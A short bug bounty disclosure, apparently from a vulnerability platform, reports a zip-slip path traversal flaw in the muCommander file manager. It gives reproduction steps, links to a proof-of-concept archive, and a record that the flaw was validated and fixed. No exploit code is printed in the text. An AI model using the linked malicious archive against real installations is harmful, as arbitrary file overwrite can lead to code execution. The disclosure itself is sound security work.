Path Traversal in mucommander/mucommander

Valid

Reported on

Feb 19th 2021


:book: Description

mucommander A lightweight, cross-platform file manager with a dual-pane interface. This package is vulnerable for zip-slip.

https://github.com/mucommander/mucommander https://www.mucommander.com/

:recycle: Steps To Reproduce-:

  1. download and run latest release from https://github.com/mucommander/mucommander/releases/tag/0.9.6-1
  2. unpack given zip file . example used : https://drive.google.com/file/d/1nLjX6QuPj8G1nl2h8sU4c3RSuuICWIHY/view?usp=sharing

:telescope: POC

https://drive.google.com/file/d/1Rqsbr9_ijoHOa949B9Q1cM2jv8jb4zwV/view?usp=sharing

💥 Impact

zip-slip (Zip Slip is a widespread arbitrary file overwrite critical vulnerability, which typically results in remote command execution)

Arik Hadas validated this vulnerability a year ago
Abdul muhaimin has been awarded the disclosure bounty
The fix bounty is now up for grabs
Arik Hadas marked this as fixed with commit d1ae0d a year ago
Simon Siebert has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation